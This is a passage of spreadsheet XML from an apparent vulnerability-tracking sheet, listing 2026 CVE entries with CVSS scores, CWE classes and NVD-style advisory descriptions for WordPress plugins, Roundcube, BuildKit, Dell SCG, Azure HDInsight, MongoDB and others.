      <c r="J3028" s="5" t="inlineStr"/>
      <c r="K3028" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3028" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="M3028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="3029">
      <c r="A3029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74925</t>
        </is>
      </c>
      <c r="C3029" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3029" s="5" t="inlineStr"/>
      <c r="F3029" s="5" t="inlineStr"/>
      <c r="G3029" s="5" t="inlineStr"/>
      <c r="H3029" s="5" t="inlineStr"/>
      <c r="I3029" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3029" s="5" t="inlineStr"/>
      <c r="K3029" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3029" s="5" t="inlineStr">
        <is>
          <t>The MultiVendorX  WordPress plugin before 5.0.16 does not restrict who can update its role and capability settings, allowing users holding its vendor role to grant that role administrator-level capabilities and take over the site.</t>
        </is>
      </c>
      <c r="M3029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74925</t>
        </is>
      </c>
    </row>
    <row r="3030">
      <c r="A3030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74998</t>
        </is>
      </c>
      <c r="C3030" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3030" s="5" t="inlineStr"/>
      <c r="F3030" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3030" s="5" t="inlineStr"/>
      <c r="H3030" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I3030" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3030" s="5" t="inlineStr"/>
      <c r="K3030" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3030" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, responses from the CSS (Cascading Style Sheets) proxy were not validated, which may result in information disclosure or XSS (cross-site scripting) via MIME sniffing.</t>
        </is>
      </c>
      <c r="M3030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74998</t>
        </is>
      </c>
    </row>
    <row r="3031">
      <c r="A3031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75593</t>
        </is>
      </c>
      <c r="C3031" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3031" s="5" t="inlineStr"/>
      <c r="F3031" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3031" s="5" t="inlineStr"/>
      <c r="H3031" s="5" t="inlineStr"/>
      <c r="I3031" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3031" s="5" t="inlineStr"/>
      <c r="K3031" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3031" s="5" t="inlineStr">
        <is>
          <t>BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Prior to 0.31.2, a custom client can produce such an upload request to the BuildKit daemon that files can escape from the BuildKit-controlled state directory. The client needs to have valid permissions to access BuildKit control API to issue builds, eg., bypass authentication, etc. This issue is fixed in version 0.31.2.</t>
        </is>
      </c>
      <c r="M3031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75593</t>
        </is>
      </c>
    </row>
    <row r="3032">
      <c r="A3032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="C3032" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3032" s="5" t="inlineStr"/>
      <c r="F3032" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3032" s="5" t="inlineStr"/>
      <c r="H3032" s="5" t="inlineStr"/>
      <c r="I3032" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3032" s="5" t="inlineStr"/>
      <c r="K3032" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3032" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="M3032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="3033">
      <c r="A3033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76561</t>
        </is>
      </c>
      <c r="C3033" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3033" s="5" t="inlineStr"/>
      <c r="F3033" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3033" s="5" t="inlineStr"/>
      <c r="H3033" s="5" t="inlineStr"/>
      <c r="I3033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3033" s="5" t="inlineStr"/>
      <c r="K3033" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3033" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t>
        </is>
      </c>
      <c r="M3033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t>
        </is>
      </c>
    </row>
    <row r="3034">
      <c r="A3034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76562</t>
        </is>
      </c>
      <c r="C3034" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3034" s="5" t="inlineStr"/>
      <c r="F3034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3034" s="5" t="inlineStr"/>
      <c r="H3034" s="5" t="inlineStr"/>
      <c r="I3034" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3034" s="5" t="inlineStr"/>
      <c r="K3034" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3034" s="5" t="inlineStr">
        <is>
          <t>The Sidebar Manager Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sbm_description' parameter in all versions up to, and including, 1.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76562</t>
        </is>
      </c>
    </row>
    <row r="3035">
      <c r="A3035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77233</t>
        </is>
      </c>
      <c r="C3035" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3035" s="5" t="inlineStr"/>
      <c r="F3035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3035" s="5" t="inlineStr"/>
      <c r="H3035" s="5" t="inlineStr"/>
      <c r="I3035" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3035" s="5" t="inlineStr"/>
      <c r="K3035" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3035" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via AdSense Regex Rewrite in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only manifests when the 'Secondary' parser engine is active (parser_engine=default); it does not exist under the default 'new' DOM-based parser engine.</t>
        </is>
      </c>
      <c r="M3035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77233</t>
        </is>
      </c>
    </row>
    <row r="3036">
      <c r="A3036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77263</t>
        </is>
      </c>
      <c r="C3036" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3036" s="5" t="inlineStr"/>
      <c r="F3036" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3036" s="5" t="inlineStr"/>
      <c r="H3036" s="5" t="inlineStr"/>
      <c r="I3036" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3036" s="5" t="inlineStr"/>
      <c r="K3036" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3036" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit works by embedding KSES-allowed markup such as abbr title attributes and HTML comments in a submitted comment so that the global strtr() substitution strips substrings from an inert tag, mutating it into an executable element such as an img onerror handler that runs in the WordPress origin for any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="M3036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77263</t>
        </is>
      </c>
    </row>
    <row r="3037">
      <c r="A3037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77830</t>
        </is>
      </c>
      <c r="C3037" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3037" s="5" t="inlineStr"/>
      <c r="F3037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3037" s="5" t="inlineStr"/>
      <c r="H3037" s="5" t="inlineStr"/>
      <c r="I3037" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3037" s="5" t="inlineStr"/>
      <c r="K3037" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3037" s="5" t="inlineStr">
        <is>
          <t>The Spam protection, Honeypot, Anti-Spam by CleanTalk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content aria-label Placeholder in all versions up to, and including, 6.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is deliverable via unauthenticated comment submission and executes exclusively for non-logged-in visitors; if comment moderation is enabled, an approving moderator must first publish the comment before the script reaches other users.</t>
        </is>
      </c>
      <c r="M3037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77830</t>
        </is>
      </c>
    </row>
    <row r="3038">
      <c r="A3038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78438</t>
        </is>
      </c>
      <c r="C3038" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3038" s="5" t="inlineStr"/>
      <c r="F3038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3038" s="5" t="inlineStr"/>
      <c r="H3038" s="5" t="inlineStr"/>
      <c r="I3038" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3038" s="5" t="inlineStr"/>
      <c r="K3038" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3038" s="5" t="inlineStr">
        <is>
          <t>The W3 Total Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via LazyLoad Background Mutator in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the "Lazy Load Images" feature with "Process background images" to be enabled, and the malicious comment to be approved by a moderator before execution is triggered.</t>
        </is>
      </c>
      <c r="M3038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78438</t>
        </is>
      </c>
    </row>
    <row r="3039">
      <c r="A3039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79426</t>
        </is>
      </c>
      <c r="C3039" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3039" s="5" t="inlineStr"/>
      <c r="F3039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3039" s="5" t="inlineStr"/>
      <c r="H3039" s="5" t="inlineStr"/>
      <c r="I3039" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3039" s="5" t="inlineStr"/>
      <c r="K3039" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3039" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file deletion vulnerability in the /adminapi/file/video_data_save component of CRMEB v6.0.0 allows authenticated attackers to delete arbitrary files via crafted POST request.</t>
        </is>
      </c>
      <c r="M3039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79426</t>
        </is>
      </c>
    </row>
    <row r="3040">
      <c r="A3040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="C3040" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3040" s="5" t="inlineStr"/>
      <c r="F3040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3040" s="5" t="inlineStr"/>
      <c r="H3040" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I3040" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3040" s="5" t="inlineStr"/>
      <c r="K3040" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3040" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M3040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="3041">
      <c r="A3041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80127</t>
        </is>
      </c>
      <c r="C3041" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3041" s="5" t="inlineStr"/>
      <c r="F3041" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3041" s="5" t="inlineStr"/>
      <c r="H3041" s="5" t="inlineStr"/>
      <c r="I3041" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3041" s="5" t="inlineStr"/>
      <c r="K3041" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3041" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M3041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80127</t>
        </is>
      </c>
    </row>
    <row r="3042">
      <c r="A3042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="C3042" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3042" s="5" t="inlineStr"/>
      <c r="F3042" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3042" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H3042" s="5" t="inlineStr"/>
      <c r="I3042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3042" s="5" t="inlineStr"/>
      <c r="K3042" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3042" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="3043">
      <c r="A3043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81431</t>
        </is>
      </c>
      <c r="C3043" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3043" s="5" t="inlineStr"/>
      <c r="F3043" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3043" s="5" t="inlineStr"/>
      <c r="H3043" s="5" t="inlineStr"/>
      <c r="I3043" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3043" s="5" t="inlineStr"/>
      <c r="K3043" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3043" s="5" t="inlineStr">
        <is>
          <t>The Registration Form for WooCommerce WordPress plugin before 1.1.3 does not validate that the form referenced during registration is a legitimate registration form, reading the permitted-role allow-list from an arbitrary attacker-controlled post instead. A user able to create a post (Contributor and above) can therefore register a new account with an arbitrary role, including Administrator, leading to full site takeover. This is an incomplete fix of CVE-2026-54807.</t>
        </is>
      </c>
      <c r="M3043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81431</t>
        </is>
      </c>
    </row>
    <row r="3044">
      <c r="A3044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81754</t>
        </is>
      </c>
      <c r="C3044" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3044" s="5" t="inlineStr"/>
      <c r="F3044" s="5" t="inlineStr"/>
      <c r="G3044" s="5" t="inlineStr"/>
      <c r="H3044" s="5" t="inlineStr"/>
      <c r="I3044" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3044" s="5" t="inlineStr"/>
      <c r="K3044" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3044" s="5" t="inlineStr">
        <is>
          <t>The Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner… plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious payload is delivered passively by any unauthenticated visitor who triggers a failed login attempt with a crafted User-Agent header, requiring no further interaction from the attacker once stored.</t>
        </is>
      </c>
      <c r="M3044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81754</t>
        </is>
      </c>
    </row>
    <row r="3045">
      <c r="A3045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81806</t>
        </is>
      </c>
      <c r="C3045" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3045" s="5" t="inlineStr"/>
      <c r="F3045" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3045" s="5" t="inlineStr"/>
      <c r="H3045" s="5" t="inlineStr"/>
      <c r="I3045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3045" s="5" t="inlineStr"/>
      <c r="K3045" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3045" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.
This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t>
        </is>
      </c>
      <c r="M3045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t>
        </is>
      </c>
    </row>
    <row r="3046">
      <c r="A3046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81825</t>
        </is>
      </c>
      <c r="C3046" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3046" s="5" t="inlineStr"/>
      <c r="F3046" s="5" t="inlineStr"/>
      <c r="G3046" s="5" t="inlineStr"/>
      <c r="H3046" s="5" t="inlineStr"/>
      <c r="I3046" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3046" s="5" t="inlineStr"/>
      <c r="K3046" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3046" s="5" t="inlineStr">
        <is>
          <t>The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Chat Message in all versions up to, and including, &lt;= 20260811 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce protecting chat message submission is publicly visible on the chat page, rendering it ineffective as an authentication barrier and allowing fully unauthenticated attackers to submit malicious messages that are stored persistently and rendered to all visitors on every page load.</t>
        </is>
      </c>
      <c r="M3046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81825</t>
        </is>
      </c>
    </row>
    <row r="3047">
      <c r="A3047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="C3047" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3047" s="5" t="inlineStr"/>
      <c r="F3047" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3047" s="5" t="inlineStr"/>
      <c r="H3047" s="5" t="inlineStr"/>
      <c r="I3047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3047" s="5" t="inlineStr"/>
      <c r="K3047" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3047" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="M3047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="3048">
      <c r="A3048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="C3048" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3048" s="5" t="inlineStr"/>
      <c r="F3048" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3048" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3048" s="5" t="inlineStr"/>
      <c r="I3048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3048" s="5" t="inlineStr"/>
      <c r="K3048" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3048" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="M3048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="3049">
      <c r="A3049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83593</t>
        </is>
      </c>
      <c r="C3049" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3049" s="5" t="inlineStr"/>
      <c r="F3049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3049" s="5" t="inlineStr"/>
      <c r="H3049" s="5" t="inlineStr"/>
      <c r="I3049" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
